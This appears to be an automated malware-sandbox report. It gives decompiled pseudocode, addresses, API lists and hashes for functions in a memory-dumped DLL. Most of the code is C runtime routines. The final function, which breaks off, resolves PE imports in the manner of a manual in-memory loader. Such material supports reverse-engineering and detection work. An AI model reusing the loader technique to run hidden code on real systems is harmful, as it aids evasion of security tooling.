                                          Function 1000C468, Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E1000C468(void* __ecx, void* __eflags, signed short _a4, signed int* _a8) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t50;
				signed int _t53;
				signed int _t54;
				signed int _t59;
				void* _t64;
				signed int _t66;
				void* _t68;
				signed int _t75;
				signed int _t79;
				signed short _t80;
				signed int _t82;
				void* _t83;
				signed int _t90;
				void* _t91;
				signed int _t92;
				signed int _t94;
				signed int* _t97;

				_t46 = E100076DE(_t45);
				if(_t46 >= 0) {
					_t97 = _a8;
					_t47 = E100095F8(_t97);
					_t79 = _t97[3];
					_t94 = _t47;
					__eflags = _t79 & 0x00000082;
					if((_t79 & 0x00000082) != 0) {
						__eflags = _t79 & 0x00000040;
						if((_t79 & 0x00000040) == 0) {
							_t75 = 0;
							__eflags = _t79 & 0x00000001;
							if((_t79 & 0x00000001) == 0) {
								L10:
								_t50 = _t97[3] & 0xffffffef | 0x00000002;
								_t97[3] = _t50;
								_t97[1] = _t75;
								__eflags = _t50 & 0x0000010c;
								if((_t50 & 0x0000010c) == 0) {
									_t64 = E1000951C();
									__eflags = _t97 - _t64 + 0x20;
									if(_t97 == _t64 + 0x20) {
										L13:
										_t66 = E1000961C(_t94);
										__eflags = _t66;
										if(_t66 == 0) {
											goto L14;
										}
									} else {
										_t68 = E1000951C();
										__eflags = _t97 - _t68 + 0x40;
										if(_t97 != _t68 + 0x40) {
											L14:
											E1000A133(_t97);
										} else {
											goto L13;
										}
									}
								}
								__eflags = _t97[3] & 0x00000108;
								if(__eflags == 0) {
									_v12 = _a4;
									_push(2);
									_push( &_v12);
									_push(_t94);
									_v8 = 2;
									_t53 = E10009680(_t75, _t91, _t94, _t97, __eflags);
									_t80 = _a4;
									_t75 = _t53;
									goto L27;
								} else {
									_t92 = _t97[2];
									 *_t97 = _t92 + 2;
									_t82 =  *_t97 - _t92;
									_v8 = _t82;
									_t97[1] = _t97[6] - 2;
									__eflags = _t82;
									if(__eflags <= 0) {
										__eflags = _t94 - 0xffffffff;
										if(_t94 == 0xffffffff) {
											L22:
											_t83 = 0x10012340;
										} else {
											__eflags = _t94 - 0xfffffffe;
											if(_t94 == 0xfffffffe) {
												goto L22;
											} else {
												_t83 = ((_t94 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10014c80 + (_t94 >> 5) * 4));
											}
										}
										__eflags =  *(_t83 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t75);
											_push(_t75);
											_push(_t94);
											_t59 = E10009FB9(_t75, _t94, _t97, __eflags);
											__eflags = (_t59 & _t92) - 0xffffffff;
											if((_t59 & _t92) == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t82);
										_push(_t92);
										_push(_t94);
										_t75 = E10009680(_t75, _t92, _t94, _t97, __eflags);
										L25:
										_t80 = _a4;
										 *(_t97[2]) = _t80;
										L27:
										__eflags = _t75 - _v8;
										if(_t75 == _v8) {
											_t54 = _t80 & 0x0000ffff;
										} else {
											L28:
											_t43 =  &(_t97[3]);
											 *_t43 = _t97[3] | 0x00000020;
											__eflags =  *_t43;
											goto L29;
										}
									}
								}
							} else {
								_t97[1] = 0;
								__eflags = _t79 & 0x00000010;
								if((_t79 & 0x00000010) == 0) {
									_t97[3] = _t79 | 0x00000020;
									L29:
									_t54 = 0xffff;
								} else {
									_t90 = _t79 & 0xfffffffe;
									__eflags = _t90;
									 *_t97 = _t97[2];
									_t97[3] = _t90;
									goto L10;
								}
							}
						} else {
							 *((intOrPtr*)(E10005EC6())) = 0x22;
							goto L6;
						}
					} else {
						 *((intOrPtr*)(E10005EC6())) = 9;
						L6:
						_t97[3] = _t97[3] | 0x00000020;
						_t54 = 0xffff;
					}
					return _t54;
				} else {
					return _t46 | 0xffffffff;
				}
			}





























                                          0x1000c46d
                                          0x1000c474
                                          0x1000c47c
                                          0x1000c481
                                          0x1000c487
                                          0x1000c48a
                                          0x1000c48c
                                          0x1000c48f
                                          0x1000c49e
                                          0x1000c4a1
                                          0x1000c4bd
                                          0x1000c4bf
                                          0x1000c4c2
                                          0x1000c4d7
                                          0x1000c4dd
                                          0x1000c4e0
                                          0x1000c4e3
                                          0x1000c4e6
                                          0x1000c4eb
                                          0x1000c4ed
                                          0x1000c4f5
                                          0x1000c4f7
                                          0x1000c505
                                          0x1000c506
                                          0x1000c50c
                                          0x1000c50e
                                          0x00000000
                                          0x00000000
                                          0x1000c4f9
                                          0x1000c4f9
                                          0x1000c501
                                          0x1000c503
                                          0x1000c510
                                          0x1000c511
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x1000c503
                                          0x1000c4f7
                                          0x1000c517
                                          0x1000c51e
                                          0x1000c5a0
                                          0x1000c5a4
                                          0x1000c5a9
                                          0x1000c5aa
                                          0x1000c5ab
                                          0x1000c5b2
                                          0x1000c5b7
                                          0x1000c5bd
                                          0x00000000
                                          0x1000c520
                                          0x1000c520
                                          0x1000c528
                                          0x1000c52d
                                          0x1000c532
                                          0x1000c535
                                          0x1000c538
                                          0x1000c53a
                                          0x1000c553
                                          0x1000c556
                                          0x1000c573
                                          0x1000c573
                                          0x1000c558
                                          0x1000c558
                                          0x1000c55b
                                          0x00000000
                                          0x1000c55d
                                          0x1000c56a
                                          0x1000c56a
                                          0x1000c55b
                                          0x1000c578
                                          0x1000c57c
                                          0x00000000
                                          0x1000c57e
                                          0x1000c57e
                                          0x1000c580
                                          0x1000c581
                                          0x1000c582
                                          0x1000c583
                                          0x1000c58d
                                          0x1000c590
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x1000c590
                                          0x1000c53c
                                          0x1000c53c
                                          0x1000c53d
                                          0x1000c53e
                                          0x1000c547
                                          0x1000c592
                                          0x1000c595
                                          0x1000c598
                                          0x1000c5bf
                                          0x1000c5bf
                                          0x1000c5c2
                                          0x1000c5cf
                                          0x1000c5c4
                                          0x1000c5c4
                                          0x1000c5c4
                                          0x1000c5c4
                                          0x1000c5c4
                                          0x00000000
                                          0x1000c5c4
                                          0x1000c5c2
                                          0x1000c53a
                                          0x1000c4c4
                                          0x1000c4c4
                                          0x1000c4c7
                                          0x1000c4ca
                                          0x1000c54e
                                          0x1000c5c8
                                          0x1000c5c8
                                          0x1000c4cc
                                          0x1000c4cf
                                          0x1000c4cf
                                          0x1000c4d2
                                          0x1000c4d4
                                          0x00000000
                                          0x1000c4d4
                                          0x1000c4ca
                                          0x1000c4a3
                                          0x1000c4a8
                                          0x00000000
                                          0x1000c4a8
                                          0x1000c491
                                          0x1000c496
                                          0x1000c4ae
                                          0x1000c4ae
                                          0x1000c4b2
                                          0x1000c4b2
                                          0x1000c5d6
                                          0x1000c476
                                          0x1000c47a
                                          0x1000c47a

                                          APIs
                                          • __ioinit.LIBCMT ref: 1000C46D
                                            • Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Once$ExecuteInit__ioinit
                                          • String ID:
                                          • API String ID: 129814473-0
                                          • Opcode ID: ce445c66c181a3168f9633bae39411e21304db9b0211bfbf8d544381d7ae233e
                                          • Instruction ID: 4d06972f43a844bfa3949195b83d417bb95582cf177f034ad1b947d460bfdcb6
                                          • Opcode Fuzzy Hash: ce445c66c181a3168f9633bae39411e21304db9b0211bfbf8d544381d7ae233e
                                          • Instruction Fuzzy Hash: B641E175500B099BF724CB68CC91E6A77E4EF453E1F10861DE8A6876D9E774FD808B10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10005033, Relevance: 9.1, APIs: 6, Instructions: 134COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 89%
                                          			E10005033(void* __eflags, signed char _a4, intOrPtr* _a8) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t43;
				signed int _t44;
				signed int _t45;
				signed int _t48;
				signed int _t52;
				void* _t60;
				signed int _t62;
				void* _t64;
				signed int _t67;
				signed int _t70;
				signed int _t74;
				signed int _t76;
				void* _t77;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t89;
				intOrPtr* _t92;

				_t44 = E100076DE(_t43);
				if(_t44 >= 0) {
					_t92 = _a8;
					_t45 = E100095F8(_t92);
					_t2 = _t92 + 0xc; // 0x66ce7cf0
					_t74 =  *_t2;
					_t89 = _t45;
					__eflags = _t74 & 0x00000082;
					if((_t74 & 0x00000082) != 0) {
						__eflags = _t74 & 0x00000040;
						if((_t74 & 0x00000040) == 0) {
							_t70 = 0;
							__eflags = _t74 & 0x00000001;
							if((_t74 & 0x00000001) == 0) {
								L10:
								_t16 = _t92 + 0xc; // 0x66ce7cf0
								_t48 =  *_t16 & 0xffffffef | 0x00000002;
								 *(_t92 + 0xc) = _t48;
								 *(_t92 + 4) = _t70;
								__eflags = _t48 & 0x0000010c;
								if((_t48 & 0x0000010c) == 0) {
									_t60 = E1000951C();
									__eflags = _t92 - _t60 + 0x20;
									if(_t92 == _t60 + 0x20) {
										L13:
										_t62 = E1000961C(_t89);
										__eflags = _t62;
										if(_t62 == 0) {
											goto L14;
										}
									} else {
										_t64 = E1000951C();
										__eflags = _t92 - _t64 + 0x40;
										if(_t92 != _t64 + 0x40) {
											L14:
											E1000A133(_t92);
										} else {
											goto L13;
										}
									}
								}
								__eflags =  *(_t92 + 0xc) & 0x00000108;
								if(( *(_t92 + 0xc) & 0x00000108) == 0) {
									__eflags = 1;
									_push(1);
									_v8 = 1;
									_push( &_a4);
									_push(_t89);
									_t45 = E10009680(_t70, _t86, _t89, _t92, 1);
									_t70 = _t45;
									goto L27;
								} else {
									_t24 = _t92 + 8; // 0x753b46c6
									_t87 =  *_t24;
									_t25 = _t87 + 1; // 0x753b46c7
									 *_t92 = _t25;
									_t26 = _t92 + 0x18; // 0x8b0d78fe
									_t76 =  *_t92 - _t87;
									_v8 = _t76;
									 *(_t92 + 4) =  *_t26 - 1;
									__eflags = _t76;
									if(__eflags <= 0) {
										__eflags = _t89 - 0xffffffff;
										if(_t89 == 0xffffffff) {
											L22:
											_t77 = 0x10012340;
										} else {
											__eflags = _t89 - 0xfffffffe;
											if(_t89 == 0xfffffffe) {
												goto L22;
											} else {
												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10014c80 + (_t89 >> 5) * 4));
											}
										}
										__eflags =  *(_t77 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t70);
											_push(_t70);
											_push(_t89);
											_t45 = E10009FB9(_t70, _t89, _t92, __eflags) & _t87;
											__eflags = _t45 - 0xffffffff;
											if(_t45 == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t76);
										_push(_t87);
										_push(_t89);
										_t70 = E10009680(_t70, _t87, _t89, _t92, __eflags);
										L25:
										_t35 = _t92 + 8; // 0x753b46c6
										_t45 = _a4;
										 *( *_t35) = _t45;
										L27:
										__eflags = _t70 - _v8;
										if(_t70 == _v8) {
											_t52 = _a4 & 0x000000ff;
										} else {
											L28:
											_t40 = _t92 + 0xc;
											 *_t40 =  *(_t92 + 0xc) | 0x00000020;
											__eflags =  *_t40;
											goto L29;
										}
									}
								}
							} else {
								 *(_t92 + 4) = 0;
								__eflags = _t74 & 0x00000010;
								if((_t74 & 0x00000010) == 0) {
									 *(_t92 + 0xc) = _t74 | 0x00000020;
									L29:
									_t52 = _t45 | 0xffffffff;
								} else {
									_t14 = _t92 + 8; // 0x753b46c6
									_t85 = _t74 & 0xfffffffe;
									__eflags = _t85;
									 *_t92 =  *_t14;
									 *(_t92 + 0xc) = _t85;
									goto L10;
								}
							}
						} else {
							_t67 = E10005EC6();
							 *_t67 = 0x22;
							goto L6;
						}
					} else {
						_t67 = E10005EC6();
						 *_t67 = 9;
						L6:
						 *(_t92 + 0xc) =  *(_t92 + 0xc) | 0x00000020;
						_t52 = _t67 | 0xffffffff;
					}
					return _t52;
				} else {
					return _t44 | 0xffffffff;
				}
			}


























                                          0x10005037
                                          0x1000503e
                                          0x10005046
                                          0x1000504b
                                          0x10005051
                                          0x10005051
                                          0x10005054
                                          0x10005056
                                          0x10005059
                                          0x10005068
                                          0x1000506b
                                          0x10005085
                                          0x10005087
                                          0x1000508a
                                          0x1000509f
                                          0x1000509f
                                          0x100050a5
                                          0x100050a8
                                          0x100050ab
                                          0x100050ae
                                          0x100050b3
                                          0x100050b5
                                          0x100050bd
                                          0x100050bf
                                          0x100050cd
                                          0x100050ce
                                          0x100050d4
                                          0x100050d6
                                          0x00000000
                                          0x00000000
                                          0x100050c1
                                          0x100050c1
                                          0x100050c9
                                          0x100050cb
                                          0x100050d8
                                          0x100050d9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x100050cb
                                          0x100050bf
                                          0x100050df
                                          0x100050e6
                                          0x10005164
                                          0x10005165
                                          0x10005166
                                          0x1000516c
                                          0x1000516d
                                          0x1000516e
                                          0x10005176
                                          0x00000000
                                          0x100050e8
                                          0x100050e8
                                          0x100050e8
                                          0x100050ed
                                          0x100050f0
                                          0x100050f2
                                          0x100050f5
                                          0x100050f8
                                          0x100050fb
                                          0x100050fe
                                          0x10005100
                                          0x10005119
                                          0x1000511c
                                          0x10005139
                                          0x10005139
                                          0x1000511e
                                          0x1000511e
                                          0x10005121
                                          0x00000000
                                          0x10005123
                                          0x10005130
                                          0x10005130
                                          0x10005121
                                          0x1000513e
                                          0x10005142
                                          0x00000000
                                          0x10005144
                                          0x10005144
                                          0x10005146
                                          0x10005147
                                          0x10005148
                                          0x1000514e
                                          0x10005153
                                          0x10005156
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x10005156
                                          0x10005102
                                          0x10005102
                                          0x10005103
                                          0x10005104
                                          0x1000510d
                                          0x10005158
                                          0x10005158
                                          0x1000515b
                                          0x1000515e
                                          0x10005178
                                          0x10005178
                                          0x1000517b
                                          0x10005186
                                          0x1000517d
                                          0x1000517d
                                          0x1000517d
                                          0x1000517d
                                          0x1000517d
                                          0x00000000
                                          0x1000517d
                                          0x1000517b
                                          0x10005100
                                          0x1000508c
                                          0x1000508c
                                          0x1000508f
                                          0x10005092
                                          0x10005114
                                          0x10005181
                                          0x10005181
                                          0x10005094
                                          0x10005094
                                          0x10005097
                                          0x10005097
                                          0x1000509a
                                          0x1000509c
                                          0x00000000
                                          0x1000509c
                                          0x10005092
                                          0x1000506d
                                          0x1000506d
                                          0x10005072
                                          0x00000000
                                          0x10005072
                                          0x1000505b
                                          0x1000505b
                                          0x10005060
                                          0x10005078
                                          0x10005078
                                          0x1000507c
                                          0x1000507c
                                          0x1000518e
                                          0x10005040
                                          0x10005044
                                          0x10005044

                                          APIs
                                          • __ioinit.LIBCMT ref: 10005037
                                            • Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Once$ExecuteInit__ioinit
                                          • String ID:
                                          • API String ID: 129814473-0
                                          • Opcode ID: 094f6d4174cdee5f7286b7252394e54f5dc20bac084be214e94df9e6538c1141
                                          • Instruction ID: 32086827ce60b9a2cbb99d25a0e80922b058c4e771a23cab2cd98d30bef894a1
                                          • Opcode Fuzzy Hash: 094f6d4174cdee5f7286b7252394e54f5dc20bac084be214e94df9e6538c1141
                                          • Instruction Fuzzy Hash: 4A41F171900B059FF324CF68C851BAB77E4DF453E2B10871DE8B6C62D9E676E9408B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10004A66, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E10004A66(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				char* _v16;
				char _v28;
				signed char _v32;
				void* _t10;
				void* _t19;
				intOrPtr* _t22;
				void* _t24;
				void* _t25;
				intOrPtr* _t27;

				_t25 = __edi;
				_t24 = __edx;
				_t19 = __ebx;
				while(1) {
					_t10 = E10008E67(_t19, _t24, _t25, _a4);
					if(_t10 != 0) {
						break;
					}
					if(E10009026(_t10, _a4) == 0) {
						_push(1);
						_t22 =  &_v28;
						_v16 = "bad allocation";
						E10008F1E(_t22,  &_v16);
						_v28 = 0x1000e460;
						E10009059( &_v28, 0x10010b04);
						asm("int3");
						_t27 = _t22;
						 *_t27 = 0x1000e460;
						E10008F5C(_t22);
						if((_v32 & 0x00000001) != 0) {
							L10003800(_t27);
						}
						return _t27;
					} else {
						continue;
					}
					L7:
				}
				return _t10;
				goto L7;
			}












                                          0x10004a66
                                          0x10004a66
                                          0x10004a66
                                          0x10004a7b
                                          0x10004a7e
                                          0x10004a86
                                          0x00000000
                                          0x00000000
                                          0x10004a79
                                          0x10004a8a
                                          0x10004a90
                                          0x10004a93
                                          0x10004a9a
                                          0x10004aa8
                                          0x10004aaf
                                          0x10004ab4
                                          0x10004ab9
                                          0x10004abb
                                          0x10004ac1
                                          0x10004aca
                                          0x10004acd
                                          0x10004ad2
                                          0x10004ad7
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x10004a79
                                          0x10004a89
                                          0x00000000

                                          APIs
                                          • _malloc.LIBCMT ref: 10004A7E
                                            • Part of subcall function 10008E67: __FF_MSGBANNER.LIBCMT ref: 10008E7E
                                            • Part of subcall function 10008E67: __NMSG_WRITE.LIBCMT ref: 10008E85
                                            • Part of subcall function 10008E67: HeapAlloc.KERNEL32(001F0000,00000000,00000001,00000000,?,00000000,?,10007F7D,1000E4A0,1000E4A0,1000E4A0,?,?,10009274,00000018,10010E08), ref: 10008EAA
                                          • std::exception::exception.LIBCMT ref: 10004A9A
                                          • __CxxThrowException@8.LIBCMT ref: 10004AAF
                                            • Part of subcall function 10009059: RaiseException.KERNEL32(?,?,?,10010B04,?,?,?,10004AB4,?,10010B04,00000000,00000001), ref: 100090AA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                          • String ID: `$h
                                          • API String ID: 1059622496-773005782
                                          • Opcode ID: 8198483a73eec0a2752513ca626908b84cd43bbea8819fe80895fe02013f144e
                                          • Instruction ID: ad3e8221741d280e2df0066782729e531edcb1fd3c4a4238d597797a5e5b62a6
                                          • Opcode Fuzzy Hash: 8198483a73eec0a2752513ca626908b84cd43bbea8819fe80895fe02013f144e
                                          • Instruction Fuzzy Hash: C2F028B550024D6AFB00DBA8DC01ADF77ACEF023C4F114426F900A2149CFB1AA4087AA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1000B39B, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E1000B39B(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0x100132fc, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x10013c2c == _t7) {
									_t9 = E10005EC6();
									 *_t9 = E10005ED9(GetLastError());
									goto L17;
								} else {
									if(E10009026(_t7, _t31) == 0) {
										_t12 = E10005EC6();
										 *_t12 = E10005ED9(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E10009026(_t6, _t31);
						 *((intOrPtr*)(E10005EC6())) = 0xc;
						goto L12;
					} else {
						E10004732(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E10008E67(__ebx, __edx, __edi, _a8);
				}
			}









                                          0x1000b3a2
                                          0x1000b3b0
                                          0x1000b3b5
                                          0x1000b3c4
                                          0x1000b3f7
                                          0x1000b3c9
                                          0x1000b3cb
                                          0x1000b3cb
                                          0x1000b3d8
                                          0x1000b3de
                                          0x1000b3e2
                                          0x1000b442
                                          0x1000b442
                                          0x1000b3e4
                                          0x1000b3ea
                                          0x1000b42c
                                          0x1000b440
                                          0x00000000
                                          0x1000b3ec
                                          0x1000b3f5
                                          0x1000b414
                                          0x1000b428
                                          0x1000b40e
                                          0x1000b40e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x1000b3f5
                                          0x1000b3ea
                                          0x00000000
                                          0x1000b410
                                          0x1000b3fd
                                          0x1000b408
                                          0x00000000
                                          0x1000b3b7
                                          0x1000b3ba
                                          0x1000b3c0
                                          0x1000b3c0
                                          0x1000b411
                                          0x1000b413
                                          0x1000b3a4
                                          0x1000b3ae
                                          0x1000b3ae

                                          APIs
                                          • _malloc.LIBCMT ref: 1000B3A7
                                            • Part of subcall function 10008E67: __FF_MSGBANNER.LIBCMT ref: 10008E7E
                                            • Part of subcall function 10008E67: __NMSG_WRITE.LIBCMT ref: 10008E85
                                            • Part of subcall function 10008E67: HeapAlloc.KERNEL32(001F0000,00000000,00000001,00000000,?,00000000,?,10007F7D,1000E4A0,1000E4A0,1000E4A0,?,?,10009274,00000018,10010E08), ref: 10008EAA
                                          • _free.LIBCMT ref: 1000B3BA
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AllocHeap_free_malloc
                                          • String ID:
                                          • API String ID: 2734353464-0
                                          • Opcode ID: 1470ddf5c31cb35418e52f366651dade25ef90282a91678f077e8ad7c8708cdc
                                          • Instruction ID: 18c43e679c10c76ba13cd9b028f176d48a0d2f42c637b465b0a36ca5614664b7
                                          • Opcode Fuzzy Hash: 1470ddf5c31cb35418e52f366651dade25ef90282a91678f077e8ad7c8708cdc
                                          • Instruction Fuzzy Hash: AD11E031404616AFFB24EF74DC4564F3BD4DF042E1F218425F9489A15ADB31DE409750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1000883C, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E1000883C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;

				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0x10010da8);
				E10008040(__ebx, __edi, __esi);
				_t31 = E10006087();
				_t25 =  *0x10012ae4; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E100091AB(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10012394; // 0x10012690
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x10012690;
								if(__eflags != 0) {
									E10004732(_t33);
								}
							}
						}
						_t20 =  *0x10012394; // 0x10012690
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0x10012394; // 0x10012690
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E100088D8();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E1000743E(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E10008085(_t33);
			}









                                          0x1000883c
                                          0x1000883c
                                          0x1000883c
                                          0x1000883e
                                          0x10008843
                                          0x1000884d
                                          0x1000884f
                                          0x10008858
                                          0x10008879
                                          0x1000887f
                                          0x10008883
                                          0x10008886
                                          0x10008889
                                          0x1000888f
                                          0x10008891
                                          0x10008893
                                          0x1000889c
                                          0x1000889e
                                          0x100088a0
                                          0x100088a6
                                          0x100088a9
                                          0x100088ae
                                          0x100088a6
                                          0x1000889e
                                          0x100088af
                                          0x100088b4
                                          0x100088b7
                                          0x100088bd
                                          0x100088c1
                                          0x100088c1
                                          0x100088c7
                                          0x100088ce
                                          0x10008860
                                          0x10008860
                                          0x10008860
                                          0x10008863
                                          0x10008865
                                          0x10008869
                                          0x1000886e
                                          0x10008876

                                          APIs
                                            • Part of subcall function 10006087: __getptd_noexit.LIBCMT ref: 10006088
                                            • Part of subcall function 10006087: __amsg_exit.LIBCMT ref: 10006095
                                          • __amsg_exit.LIBCMT ref: 10008869
                                          • __lock.LIBCMT ref: 10008879
                                          • InterlockedDecrement.KERNEL32(?), ref: 10008896
                                          • _free.LIBCMT ref: 100088A9
                                          • InterlockedIncrement.KERNEL32(10012690), ref: 100088C1
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
                                          • String ID:
                                          • API String ID: 1231874560-0
                                          • Opcode ID: 30cc922b94fd66d93e4772b0e45363f14a3d134312cd16711b26b484a5aab7eb
                                          • Instruction ID: 6fa5c55f02b032b9b52f9637cbc65706c3d9556ef65a5339b15ab8c9acf7f00e
                                          • Opcode Fuzzy Hash: 30cc922b94fd66d93e4772b0e45363f14a3d134312cd16711b26b484a5aab7eb
                                          • Instruction Fuzzy Hash: 7901C075A016219BFB44EB64888578E77A0FF047D4F51800AE9886768CCF38AB91CFD2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10001470, Relevance: 6.4, APIs: 5, Instructions: 143COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 48%
                                          			E10001470(void* __ecx, intOrPtr* _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _t44;
				signed short _t56;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t67;
				intOrPtr* _t68;
				intOrPtr _t70;
				void _t71;
				signed short* _t72;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr* _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				signed short* _t82;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				_t65 =  *_t78;
				_t2 = _t78 + 4; // 0x4d8d5010
				_t79 =  *_t2;
				_a4 = _t79;
				if( *((intOrPtr*)(_t65 + 0x84)) == 0) {
					L22:
					return 1;
				} else {
					_t67 =  *((intOrPtr*)(_t65 + 0x80)) + _t79;
					_v12 = _t67;
					if(IsBadReadPtr(_t67, 0x14) == 0) {
						while(1) {
							_t44 =  *((intOrPtr*)(_t67 + 0xc));
							if(_t44 == 0) {
								goto L22;
							}
							_t8 = _t78 + 0x28; // 0x12f7805
							_t9 = _t78 + 0x1c; // 0xe58b0000
							_t80 =  *((intOrPtr*)( *_t9))(_t44 + _t79,  *_t8);
							_t85 = _t84 + 8;
							_v8 = _t80;
							if(_t80 == 0) {
								SetLastError(0x7e);
								return 0;
							} else {
								_t11 = _t78 + 0xc; // 0xd0ff0000
								_t14 = _t78 + 8; // 0x637e8ef
